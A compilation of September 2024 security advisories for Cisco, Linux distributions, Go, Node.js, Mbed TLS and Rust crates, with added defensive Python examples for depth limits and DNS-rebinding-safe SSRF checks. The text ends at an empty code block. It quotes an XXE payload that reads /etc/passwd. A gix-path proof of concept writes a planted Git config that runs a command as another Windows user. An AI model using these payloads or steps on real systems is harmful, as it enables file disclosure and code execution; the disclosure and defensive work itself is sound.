04.09.2024 19:00:00cisco[CISCO-SA-MERAKI-AGENT-DLL-HJ-PTN7PTKE] Cisco Meraki Systems Manager Agent for Windows Privilege Escalation Vulnerability (high)A vulnerability in Cisco Meraki Systems Manager (SM) Agent for Windows could allow an authenticated, local attacker to execute arbitrary code with elevated privileges.This vulnerability is due to incorrect handling of directory search paths at runtime. A low-privileged attacker could exploit this vulnerability by placing both malicious configuration files and malicious DLL files on an affected system, which would read and execute the files when Cisco Meraki SM launches on startup. A successful exploit could allow the attacker to execute arbitrary code on the affected system with SYSTEM privileges.Cisco Meraki has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-MERAKI-AGENT-DLL-HJ-PTN7PTKE
04.09.2024 19:00:00cisco[CISCO-SA-ISE-INJECTION-6KN9TSXM] Cisco Identity Services Engine Command Injection Vulnerability (medium)A vulnerability in specific CLI commands in Cisco Identity Services Engine (ISE) could allow an authenticated, local attacker to perform command injection attacks on the underlying operating system and elevate privileges to root. To exploit this vulnerability, the attacker must have valid Administrator privileges on an affected device.This vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by submitting a crafted CLI command. A successful exploit could allow the attacker to elevate privileges to root.There are no workarounds that address this vulnerability.https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-ISE-INJECTION-6KN9TSXM
04.09.2024 19:00:00cisco[CISCO-SA-CSLU-7GHMZWMW] Cisco Smart Licensing Utility Vulnerabilities (critical)Multiple vulnerabilities in Cisco Smart Licensing Utility could allow an unauthenticated, remote attacker to collect sensitive information or administer Cisco Smart Licensing Utility services on a system while the software is running.Cisco has released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities.For more information about these vulnerabilities, see the Details section of this advisory.https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-CSLU-7GHMZWMW
04.09.2024 19:00:00cisco[CISCO-SA-EXPRESSWAY-AUTH-KDFRCZ2J] Cisco Expressway Edge Improper Authorization Vulnerability (medium)A vulnerability in Cisco Expressway Edge (Expressway-E) could allow an authenticated, remote attacker to masquerade as another user on an affected system.This vulnerability is due to inadequate authorization checks for Mobile and Remote Access (MRA) users. An attacker could exploit this vulnerability by running a series of crafted commands. A successful exploit could allow the attacker to intercept calls that are destined for a particular phone number or to make phone calls and have that phone number appear on the caller ID. To successfully exploit this vulnerability, the attacker must be an MRA user on an affected system.There are no workarounds that address this vulnerability.https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-EXPRESSWAY-AUTH-KDFRCZ2J
04.09.2024 19:00:00cisco[CISCO-SA-DUO-EPIC-INFO-SDLV6H8Y] Cisco Duo Epic for Hyperdrive Information Disclosure Vulnerability (medium)A vulnerability in Cisco Duo Epic for Hyperdrive could allow an authenticated, local attacker to view sensitive information in cleartext on an affected system.This vulnerability is due to improper storage of an unencrypted registry key. A low-privileged attacker could exploit this vulnerability by viewing or querying the registry key on the affected system. A successful exploit could allow the attacker to view sensitive information in cleartext.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-DUO-EPIC-INFO-SDLV6H8Y
04.09.2024 11:40:06ubuntu[USN-6988-1] Twisted vulnerabilitiesSeveral security issues were fixed in Twisted.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6988-1
04.09.2024 05:24:02fedora[FEDORA-2024-584e1133e4] Fedora 40: seamonkeyUpdate to 2.53.19https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-584e1133e4
04.09.2024 05:23:53fedora[FEDORA-2024-b40491b84b] Fedora 40: apr (medium)This update to the apr package fixes a security issue in the handling of shared memory permissions. SECURITY: CVE-2023-49582: Apache Portable Runtime (APR): Unexpected lax shared memory permissions (cve.mitre.org) Lax permissions set by the Apache Portable Runtime library on Unix platforms would allow local users read access to named shared memory segments, potentially revealing sensitive application data.https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-b40491b84b
04.09.2024 11:28:02almalinux[ALSA-2024:6163] python3.9 security update (moderate)python3.9 security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:6163
04.09.2024 11:24:23almalinux[ALSA-2024:6179] python3.11 security update (moderate)python3.11 security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:6179
04.09.2024 12:13:16almalinux[ALSA-2024:6184] orc security update (moderate)orc security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:6184
04.09.2024 11:22:18almalinux[ALSA-2024:6188] runc security update (moderate)runc security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:6188
04.09.2024 11:20:54almalinux[ALSA-2024:6192] wget security update (moderate)wget security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:6192
04.09.2024 11:26:08almalinux[ALSA-2024:6166] krb5 security update (moderate)krb5 security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:6166
04.09.2024 11:23:09almalinux[ALSA-2024:6186] containernetworking-plugins security update (moderate)containernetworking-plugins security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:6186
04.09.2024 11:19:33almalinux[ALSA-2024:6194] podman security update (important)podman security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:6194
04.09.2024 11:17:53almalinux[ALSA-2024:6197] ghostscript security update (moderate)ghostscript security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:6197
06.09.2024 01:22:04slackware[SSA:2024-249-01] mozilla-thunderbird
New mozilla-thunderbird packages are available for Slackware 15.0 and -current to fix security issues.
**Here are the details from the Slackware 15.0 ChangeLog**
```
patches/packages/mozilla-thunderbird-115.15.0-i686-1_slack15.0.txz: Upgraded.
  This release contains security fixes and improvements.
  For more information, see:
    https://www.mozilla.org/en-US/thunderbird/115.15.0esr/releasenotes/
  (* Security fix *)
```
**Where to find the new packages**
Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)
Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.
Updated package for Slackware 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/mozilla-thunderbird-115.15.0-i686-1_slack15.0.txz
Updated package for Slackware x86_64 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/mozilla-thunderbird-115.15.0-x86_64-1_slack15.0.txz
Updated package for Slackware -current:
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/mozilla-thunderbird-128.2.0esr-i686-1.txz
Updated package for Slackware x86_64 -current:
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/xap/mozilla-thunderbird-128.2.0esr-x86_64-1.txz
**MD5 signatures**
Slackware 15.0 package:
b6a4d86841b414a630cd29a74c81e23b  mozilla-thunderbird-115.15.0-i686-1_slack15.0.txz
Slackware x86_64 15.0 package:
a566081cd38f2726bb5a91690f4d29b3  mozilla-thunderbird-115.15.0-x86_64-1_slack15.0.txz
Slackware -current package:
2f88f6bced42ee491104461c50c3597a  xap/mozilla-thunderbird-128.2.0esr-i686-1.txz
Slackware x86_64 -current package:
68685ed6edb44062bacd841ea8263d1a  xap/mozilla-thunderbird-128.2.0esr-x86_64-1.txz
**Installation instructions**
Upgrade the package as root:
`# upgradepkg mozilla-thunderbird-115.15.0-i686-1_slack15.0.txz`
https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-249-01
05.09.2024 23:39:48ubuntu[USN-6994-1] Netty vulnerabilitiesSeveral security issues were fixed in Netty.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6994-1
05.09.2024 23:33:02ubuntu[USN-6991-1] AIOHTTP vulnerabilitypython-aiohttp would allow unintended access to files over the network.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6991-1
05.09.2024 22:15:13alpinelinux[ALPINE:CVE-2024-45158] mbedtls vulnerability[From CVE-2024-45158] An issue was discovered in Mbed TLS 3.6 before 3.6.1. A stack buffer overflow in mbedtls_ecdsa_der_to_raw() and mbedtls_ecdsa_raw_to_der() can occur when the bits parameter is larger than the largest supported curve. In some configurations with PSA disabled, all values of bits are affected. (This never happens in internal library calls, but can affect applications that call these functions directly.)https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-45158
05.09.2024 22:15:13alpinelinux[ALPINE:CVE-2024-45159] mbedtls vulnerability[From CVE-2024-45159] An issue was discovered in Mbed TLS 3.x before 3.6.1. With TLS 1.3, when a server enables optional authentication of the client, if the client-provided certificate does not have appropriate values in the keyUsage or extKeyUsage extensions, then the return value of mbedtls_ssl_get_verify_result() would incorrectly have the MBEDTLS_X509_BADCERT_KEY_USAGE and MBEDTLS_X509_BADCERT_KEY_USAGE bits clear. As a result, an attacker that had a certificate valid for uses other than TLS client authentication would nonetheless be able to use it for TLS client authentication. Only TLS 1.3 servers were affected, and only with optional authentication (with required authentication, the handshake would be aborted with a fatal alert).https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-45159
05.09.2024 22:15:12alpinelinux[ALPINE:CVE-2024-45157] mbedtls vulnerability[From CVE-2024-45157] An issue was discovered in Mbed TLS before 2.28.9 and 3.x before 3.6.1, in which the user-selected algorithm is not used. Unlike previously documented, enabling MBEDTLS_PSA_HMAC_DRBG_MD_TYPE does not cause the PSA subsystem to use HMAC_DRBG: it uses HMAC_DRBG only when MBEDTLS_PSA_CRYPTO_EXTERNAL_RNG and MBEDTLS_CTR_DRBG_C are disabled.https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-45157
05.09.2024 07:07:22fedora[FEDORA-2024-8bda3bcaea] Fedora 40: kernel (medium)The 6.10.7 stable kernel update contains a number of important fixes across the tree.https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-8bda3bcaea
05.09.2024 04:54:53ubuntu[USN-6993-1] Vim vulnerabilitiesSeveral security issues were fixed in Vim.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6993-1
05.09.2024 03:51:18ubuntu[USN-6992-1] Firefox vulnerabilitiesSeveral security issues were fixed in Firefox.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6992-1
05.09.2024 03:00:00debian[DSA-5766-1] chromium (high)security updatehttps://secdb.nttzen.cloud/security-advisory/debian/DSA-5766-1
05.09.2024 03:00:00oraclelinux[ELSA-2024-6311] resource-agents security update (moderate)[4.9.0-54.4] bundled setuptools: fix CVE-2024-6345 (Resolves: RHEL-50360); [4.9.0-54.3] gcp-pd-move: fix TLS_VERSION_1 issue (Resolves: RHEL-50041); [4.9.0-54.2] bundled urllib3: fix CVE-2024-37891 (Resolves: RHEL-44923); [4.9.0-54.1] AWS agents: retry failed metadata requests to avoid instantly failing when there is a hiccup in the network or metadata service; db2: fix OCF_SUCESS typo (Resolves: RHEL-34137, RHEL-32828)https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-6311
05.09.2024 03:00:00oraclelinux[ELSA-2024-6422] bubblewrap and flatpak security update (important)bubblewrap [0.4.0-2]: Backport upstream fix to help address CVE-2024-42472 in flatpak. flatpak [1.12.9-3]: Fix previous changelog entry. [1.12.9-2]: Backport upstream patches for CVE-2024-42472; require a bubblewrap version that has the new --bind-fd option backported for addressing CVE-2024-42472.https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-6422
05.09.2024 03:00:00redhat[RHSA-2024:6422] bubblewrap and flatpak security update (important)Bubblewrap (/usr/bin/bwrap) is a core execution engine for unprivileged containers that works as a setuid binary on kernels without user namespaces. Security Fix(es): * flatpak: Access to files outside sandbox for apps using persistent= (--persist) (CVE-2024-42472). For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:6422
05.09.2024 09:39:10almalinux[ALSA-2024:6309] fence-agents security update (moderate)fence-agents security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:6309
05.09.2024 09:55:28almalinux[ALSA-2024:6356] bubblewrap and flatpak security update (important)bubblewrap and flatpak security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:6356
05.09.2024 20:40:19rustsec[RUSTSEC-2024-0370] proc-macro-error is unmaintainedproc-macro-error's maintainer seems to be unreachable, with no commits for 2 years, no releases pushed for 4 years, and no activity on the GitLab repo or response to email. proc-macro-error also depends on `syn 1.x`, which may be bringing duplicate dependencies into dependent build trees. Possible alternative(s): [proc-macro-error2](https://crates.io/crates/proc-macro-error2)https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0370
07.09.2024 00:15:12alpinelinux[ALPINE:CVE-2024-34156] go vulnerability[From CVE-2024-34156] Calling Decoder.Decode on a message which contains deeply nested structures can cause a panic due to stack exhaustion. This is a follow-up to CVE-2022-30635.https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-34156
07.09.2024 00:15:12alpinelinux[ALPINE:CVE-2024-34158] go vulnerability[From CVE-2024-34158] Calling Parse on a "// +build" build tag line with deeply nested expressions can cause a panic due to stack exhaustion.https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-34158
07.09.2024 00:15:11alpinelinux[ALPINE:CVE-2024-34155] go vulnerability[From CVE-2024-34155] Calling any of the Parse functions on Go source code which contains deeply nested literals can cause a panic due to stack exhaustion.https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-34155
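The three Go advisories above (CVE-2024-34155, CVE-2024-34156, CVE-2024-34158) share one root cause: a recursive parser is handed attacker-controlled nesting and recurses until the goroutine stack is exhausted, which in Go is a fatal panic. The mitigation is the same in every language: bound the nesting depth before the recursive parser sees the input. The following is an added example, not code from the Go project or from any advisory on this page; it uses JSON in Python as a stand-in for the Go decoders, scanning the raw text once with an iterative loop (so the check itself cannot blow the stack) and rejecting documents deeper than an assumed policy limit of 64 levels.

```python
"""Bound the nesting depth of untrusted input before handing it to a recursive parser."""
from __future__ import annotations

import json


class NestingTooDeep(ValueError):
    """Raised when the input nests deeper than the caller allows."""


def json_nesting_depth(text: str, max_depth: int) -> int:
    """Return the maximum bracket nesting depth of a JSON document.

    Scans the text once, ignoring brackets inside string literals, and raises
    NestingTooDeep as soon as the depth exceeds max_depth.  The scan is a flat
    loop, so it cannot exhaust the stack the way a recursive descent would.
    Unbalanced closers are not diagnosed here; the real parser reports those.
    """
    depth = 0
    deepest = 0
    in_string = False
    escaped = False
    for ch in text:
        if in_string:
            if escaped:
                escaped = False
            elif ch == "\\":
                escaped = True
            elif ch == '"':
                in_string = False
            continue
        if ch == '"':
            in_string = True
        elif ch in "[{":
            depth += 1
            if depth > max_depth:
                raise NestingTooDeep(f"nesting depth exceeds {max_depth}")
            deepest = max(deepest, depth)
        elif ch in "]}":
            depth -= 1
    return deepest


def exceeds_depth(text: str, max_depth: int) -> bool:
    """True if the document nests deeper than max_depth (no exception)."""
    try:
        json_nesting_depth(text, max_depth)
    except NestingTooDeep:
        return True
    return False


def safe_loads(text: str, max_depth: int = 64):
    """json.loads() guarded by a depth check on the raw text.

    Without the guard, json.loads on a 100,000-deep array raises RecursionError
    from inside the parser; with it, the input is refused before parsing starts.
    """
    json_nesting_depth(text, max_depth)
    return json.loads(text)
```

The same idea carries over to any recursive decoder (gob, a Go parser, YAML): measure depth in a non-recursive pre-pass, or thread a depth counter through the recursion and fail once it crosses the limit.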
06.09.2024 22:45:29maven[MAVEN:GHSA-6CR6-PH3P-F5RF] XXE vulnerability in XSLT transforms in `org.hl7.fhir.core` (high)Impact: XSLT transforms performed by various components are vulnerable to XML external entity injection. A processed XML file with a malicious DTD (`<!DOCTYPE foo [<!ENTITY example SYSTEM "/etc/passwd"> ]>`) could produce XML containing data from the host system. This impacts deployments where org.hl7.fhir.core runs on a host to which external clients can submit XML. Patches: This issue has been patched in release 6.3.23. Workarounds: None. References: [MITRE CWE-611](https://cwe.mitre.org/data/definitions/611.html), [OWASP XML External Entity Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#transformerfactory)https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-6CR6-PH3P-F5RF
06.09.2024 07:05:22fedora[FEDORA-2024-865828665c] Fedora 40: python-django4.2urlize and urlizetrunc were subject to a potential denial-of-service attack via very large inputs with a specific sequence of characters.https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-865828665c
06.09.2024 07:05:22fedora[FEDORA-2024-4a08381122] Fedora 40: python-djangourlize and urlizetrunc were subject to a potential denial-of-service attack via very large inputs with a specific sequence of characters.https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-4a08381122
06.09.2024 07:05:07fedora[FEDORA-2024-430678b035] Fedora 40: lua-mpackFix buffer overrun when giving an offset to Session:receivehttps://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-430678b035
06.09.2024 07:04:03fedora[FEDORA-2024-3d656dafe1] Fedora 40: mingw-python3 (high)Add patch for CVE-2024-8088. Update to python-3.11.9. Backport fix for CVE-2024-6923.https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-3d656dafe1
06.09.2024 06:53:47fedora[FEDORA-2024-e2bde0853b] Fedora 39: python-djangourlize and urlizetrunc were subject to a potential denial-of-service attack via very large inputs with a specific sequence of characters.https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-e2bde0853b
06.09.2024 06:53:46fedora[FEDORA-2024-28892f7c8f] Fedora 39: python-django4.2urlize and urlizetrunc were subject to a potential denial-of-service attack via very large inputs with a specific sequence of characters.https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-28892f7c8f
06.09.2024 06:53:42fedora[FEDORA-2024-a84c59eedc] Fedora 39: lua-mpackFix buffer overrun when giving an offset to Session:receivehttps://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-a84c59eedc
06.09.2024 06:53:34fedora[FEDORA-2024-992047a33f] Fedora 39: python3.13Security fix for CVE-2024-8088https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-992047a33f
06.09.2024 06:53:32fedora[FEDORA-2024-dab2a69be9] Fedora 39: python3.11Security fix for CVE-2024-8088https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-dab2a69be9
06.09.2024 06:53:31fedora[FEDORA-2024-7008b2fedf] Fedora 39: mingw-python3 (high)Add patch for CVE-2024-8088. Update to python-3.11.9. Backport fix for CVE-2024-6923.https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-7008b2fedf
06.09.2024 06:53:31fedora[FEDORA-2024-dc7f1d57e4] Fedora 39: python3.9Security fix for CVE-2024-8088https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-dc7f1d57e4
06.09.2024 18:22:53pypi[PYSEC-2024-74] mindsdb vulnerabilityMindsDB is a platform for building artificial intelligence from enterprise data. Prior to version 23.12.4.2, a threat actor can bypass the server-side request forgery protection on the whole website with DNS Rebinding. The vulnerability can also lead to denial of service. Version 23.12.4.2 contains a patch.https://secdb.nttzen.cloud/security-advisory/pypi/PYSEC-2024-74
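DNS rebinding, as in the MindsDB advisory above, defeats any SSRF filter that resolves a hostname, checks the answer, and then lets the HTTP client resolve the same name a second time: the attacker's authoritative server answers with a public address for the check and with 127.0.0.1 or a link-local metadata address for the connection. The following is an added example, not MindsDB code: `pin_public_address` resolves once, rejects the URL unless every returned address is public, and returns the vetted IP so the caller connects to that address (sending the original hostname in the Host header and SNI) rather than re-resolving. `RebindingResolver` is a constructed test double that plays the attacker's DNS server, and `naive_connect_target` shows the vulnerable check-then-re-resolve flow for comparison. All function names and the sample hostnames are this example's own; `1.2.3.4` is used only as a placeholder public address.

```python
"""Resolve once, vet every address, then connect to the vetted address."""
from __future__ import annotations

import ipaddress
import socket
from typing import Callable, Iterator
from urllib.parse import urlsplit

# A resolver maps a hostname to the list of addresses it currently has.
Resolver = Callable[[str], list[str]]


def system_resolver(host: str) -> list[str]:
    """OS resolver; returns every A/AAAA answer so that all of them get checked."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def is_public(ip: str) -> bool:
    """False for loopback, RFC 1918, link-local (cloud metadata), multicast,
    reserved and unspecified addresses, for both IPv4 and IPv6.  An address
    string ipaddress cannot parse (e.g. a scoped IPv6 literal) raises, and the
    callers below treat that as a rejection: fail closed."""
    addr = ipaddress.ip_address(ip)
    return not (
        addr.is_private or addr.is_loopback or addr.is_link_local
        or addr.is_multicast or addr.is_reserved or addr.is_unspecified
    )


def pin_public_address(url: str, resolve: Resolver = system_resolver) -> tuple[str, str, int]:
    """Return (hostname, pinned_ip, port) or raise ValueError.

    The caller must open its connection to pinned_ip, keeping the hostname for
    the Host header / SNI, so a rebind between check and use changes nothing.
    """
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        raise ValueError("only http(s) URLs with a hostname are allowed")
    port = parts.port or (443 if parts.scheme == "https" else 80)
    addrs = resolve(parts.hostname)
    if not addrs:
        raise ValueError(f"{parts.hostname} did not resolve")
    blocked = [a for a in addrs if not is_public(a)]
    if blocked:
        raise ValueError(f"{parts.hostname} resolves to non-public address(es) {blocked}")
    return parts.hostname, addrs[0], port


def is_allowed(url: str, resolve: Resolver = system_resolver) -> bool:
    """Boolean form of pin_public_address for callers that only need a verdict."""
    try:
        pin_public_address(url, resolve)
    except ValueError:
        return False
    return True


class RebindingResolver:
    """Constructed test double standing in for an attacker-controlled DNS server:
    it hands out the prepared answers in order, e.g. a public IP for the first
    lookup and 127.0.0.1 for the second."""

    def __init__(self, answers: list[list[str]]) -> None:
        self._answers: Iterator[list[str]] = iter(answers)

    def __call__(self, host: str) -> list[str]:
        return next(self._answers)


def naive_connect_target(url: str, resolve: Resolver) -> str:
    """The vulnerable pattern: validate, then let the client resolve again.
    Returns the address such a client would actually connect to."""
    hostname, _pinned_ip, _port = pin_public_address(url, resolve)
    return resolve(hostname)[0]
```

Note that rejecting the URL when any answer is non-public matters as much as pinning: a name that returns one public and one private address is a classic bypass when only the first answer is inspected. Redirects need the same treatment, since each `Location` is a fresh URL that must be pinned again.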
06.09.2024 10:42:19almalinux[ALSA-2024:6422] bubblewrap and flatpak security update (important)bubblewrap and flatpak security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:6422
07.09.2024 19:15:02alpinelinux[ALPINE:CVE-2023-39333] nodejs, nodejs-current vulnerability[From CVE-2023-39333] Maliciously crafted export names in an imported WebAssembly module can inject JavaScript code. The injected code may be able to access data and functions that the WebAssembly module itself does not have access to, as if the WebAssembly module were a JavaScript module. This vulnerability affects users of any active release line of Node.js. The vulnerable feature is only available if Node.js is started with the `--experimental-wasm-modules` command line option.https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2023-39333
07.09.2024 19:15:02alpinelinux[ALPINE:CVE-2024-36137] nodejs vulnerability (low)[From CVE-2024-36137] A vulnerability has been identified in Node.js, affecting users of the experimental permission model when the --allow-fs-write flag is used. The Node.js permission model does not operate on file descriptors, so operations such as fs.fchown or fs.fchmod can use a "read-only" file descriptor to change the owner and permissions of a file.https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-36137
07.09.2024 04:39:44fedora[FEDORA-2024-9922206495] Fedora 40: firefoxNew upstream update (130.0)https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-9922206495
07.09.2024 04:48:33rustsec[RUSTSEC-2024-0371] gix-path improperly resolves configuration path reported by Git
### Summary
`gix-path` runs `git` to find the path of a configuration file associated with the `git` installation, but improperly resolves paths containing unusual or non-ASCII characters, in rare cases enabling a local attacker to inject configuration leading to code execution.
### Details
In `gix_path::env`, the underlying implementation of the `installation_config` and `installation_config_prefix` functions calls `git config -l --show-origin` to find the path of a file to treat as belonging to the `git` installation.
Affected versions of `gix-path` do not pass `-z`/`--null` to cause `git` to report literal paths ([`650a1b5`](https://github.com/Byron/gitoxide/commit/650a1b5cf25e086197cc55a68525a411e1c28031)). Instead, to cover the occasional case that `git` outputs a quoted path, they attempt to parse the path by stripping the quotation marks: <https://github.com/Byron/gitoxide/blob/1cfe577d461293879e91538dbc4bbfe01722e1e8/gix-path/src/env/git/mod.rs#L138-L142>
The problem is that, when a path is quoted, it may change in substantial ways beyond the addition of quotation marks. If not reversed, these changes can result in another valid path that is not equivalent to the original.
This is not limited to paths with unusual characters such as quotation marks or newlines. Unless `git` is explicitly configured with `core.quotePath` set to `false`, it also happens when the path contains most non-ASCII characters, including accented or non-English letters. For example, `é` is transformed to `\303\251`, with literal backslashes. (This is an octal representation of the bytes in its UTF-8 encoding. This behavior is not limited to systems that encode paths with UTF-8 on disk.)
Rarely, the configuration file `gix-path` wrongly attempts to open can be created by an attacker who has a limited user account on the system. The attacker would often need to request an account username tailored to carrying out the attack.
### PoC
#### Quick demonstration on Unix
On a Unix-like system in which Git supports no higher scope than `system` for configuration variables (i.e., not on macOS with Apple Git), in a locale that supports UTF-8, with `gitoxide` installed, run:
```sh
mkdir myrepo
cd myrepo
git init
printf '[real]\n\trealvar = realval\n' > 'é'
printf '[fake]\n\tfakevar = fakeval\n' > '\303\251'
GIT_CONFIG_SYSTEM='é' gix config
```
If the above conditions are satisfied and the `gix` command was built against an affected version of `gix-path`, then the last command's output looks something like this:
```text
# From '\303\251' (GitInstallation)
[fake]
	fakevar = fakeval
# From 'é' (System)
[real]
	realvar = realval
# From '/home/ubuntu/.gitconfig' (User)
[init]
	defaultBranch = main
# From './.git/config' (Local)
[core]
	repositoryformatversion = 0
	filemode = true
	bare = false
	logallrefupdates = true
```
#### Demonstration across user accounts on Windows
On a test system running Windows on which Git for Windows is *not* installed system-wide (resembling a scenario in which users who wish to use Git are expected to install it themselves for their accounts), create two accounts, with these usernames:
- *Renée*, the target of the attack. This user may be a limited user or an administrator. Its user profile directory is assumed to be `C:\Users\Renée`.
- *Ren*, the user who carries out the attack. This user should be a limited user, since an administrator would not need to exploit this vulnerability to inject configuration. Its user profile directory is assumed to be `C:\Users\Ren`.
As *Ren*, run these commands in PowerShell:
```powershell
$d = "$HOME\303\251e\AppData\Local\Programs\Git\etc"
mkdir $d
git config --file $d\gitconfig core.sshCommand calc.exe
icacls $HOME\303 /grant 'Renée:(RX)' /T
```
(The `gitconfig` file can instead be written manually, in which case *Ren* need not have `git`.)
As *Renée*:
1. Install Git for Windows in the default location for non-systemwide installations, which for that user account is inside `C:\Users\Renée\AppData\Local\Programs`. For a non-administrative installation, Git for Windows will pick this location automatically. Allow the installer to place the directory containing `git` in the user's `PATH`, as it does by default. (The scenario can be modified for any location the attacker can predict. So, for example, *Renée* can install Git for Windows with [`scoop`](https://scoop.sh/), and *Ren* could carry out the attack with correspondingly modified path components in place of `AppData\Local\Programs\Git`.)
2. Install `gitoxide` using any common technique, such as by [installing Rust](https://www.rust-lang.org/tools/install) and then running `cargo install gitoxide`.
3. Open a PowerShell window and run a `gix` command that attempts to run the SSH client for transport, for example `gix clone ssh://localhost/myrepo.git`. At least one, and usually two, instances of the Windows calculator will pop up. This happens because `calc.exe` was configured in the fake configuration file the user *Ren* was able to cause to be used, by placing it at the location `gix-path` wrongly resolved the path of *Renée*'s own configuration file to.
The `gitconfig` file written by the attacker can be adjusted with an arbitrary choice of payload, or to set other configuration variables.
### Impact
On a single-user system, it is not possible to exploit this, unless `GIT_CONFIG_SYSTEM` and `GIT_CONFIG_GLOBAL` have been set to unusual values or Git has been installed in an unusual way. Such a scenario is not expected.
Exploitation is unlikely even on a multi-user system, though it is plausible in some uncommon configurations or use cases. It is especially unlikely with Apple Git on macOS, due to its very high scoped configuration in `/Library` or `/Applications` that would be detected instead, as in [CVE-2024-45305](https://github.com/advisories/GHSA-v26r-4c9c-h3j6).
The likelihood of exploitation may be higher on Windows, where attacks such as those shown in the Windows proof-of-concept above can be performed due to the status of `\` as a directory separator, and where there is no restriction on usernames containing accented or non-English letters (though the latter is also permitted on some other systems). Even then, complex user interaction is required. In most cases, a system administrator would have to approve an innocuous-seeming username, and then the targeted user (who could be the same or a different user) would have to use an application that uses `gix-path`.
In general, exploitation is more likely to succeed if at least one of the following applies:
- Users are expected to install `git` themselves, and are likely to do so in predictable locations.
- Locations where `git` is installed, whether due to usernames in their paths or otherwise, contain characters that `git` quotes by default in paths, such as non-English letters and accented letters.
- A custom `system`-scope configuration file is specified with the `GIT_CONFIG_SYSTEM` environment variable, and its path is in an unusual location or has strangely named components.
- A `system`-scope configuration file is absent, empty, or suppressed by means other than `GIT_CONFIG_NOSYSTEM`. Currently, `gix-path` can treat a `global`-scope configuration file as belonging to the installation if no higher scope configuration file is available. This increases the likelihood of exploitation even on a system where `git` is installed system-wide in an ordinary way.
However, exploitation is expected to be very difficult even under any combination of those factors.
Although the effect here is similar to [CVE-2022-24765](https://github.com/git-for-windows/git/security/advisories/GHSA-vw2c-22j4-2fh2) once exploited, a greater degree of user interaction would usually be required, and the attack complexity here is much higher because the necessary conditions are uncommon and challenging to predict.
https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0371
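Git's quoted-path output, decoded correctly, as an added example that is not gitoxide code. The fix the advisory points to is to ask Git for unquoted output with `-z`/`--null`; when human-readable output has to be consumed anyway, the escapes must be decoded rather than only the surrounding quotation marks removed. `unquote_git_path` implements Git's C-style quoting (the `\a \b \t \n \v \f \r \\ \"` escapes plus three-digit octal escapes for every other quoted byte, which is how `é` becomes `\303\251`) and returns the raw path bytes; `naive_strip_quotes` reproduces the approach the advisory describes so the two results can be compared. Both function names are this example's own.

```python
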